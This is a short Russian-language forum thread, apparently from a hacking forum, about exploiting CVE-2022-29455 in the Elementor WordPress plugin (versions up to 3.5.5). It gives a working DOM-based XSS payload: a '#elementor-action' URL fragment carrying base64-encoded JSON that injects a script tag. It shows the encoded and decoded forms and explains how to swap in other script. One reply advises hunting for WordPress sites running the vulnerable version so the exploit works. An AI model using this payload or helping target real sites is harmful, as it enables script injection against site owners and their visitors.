CVE-2022-29455 доработать

Статус
Закрыто для дальнейших ответов.
exploit работает только на версии 3.5.5

Код:
#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9

тебе искать надо wp сайты на которых установлен elementor данной версии тогда будет работать
 

до <= 3.5.5 versions​

не суть
после settings= вставлять нужно строку в base64
зашифрованная строка - eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
расшифрованная - {"type":"null","html":"<script>alert('xss')</script>"}
все будет работать до

3.5.5 versions​

 
Статус
Закрыто для дальнейших ответов.
Верх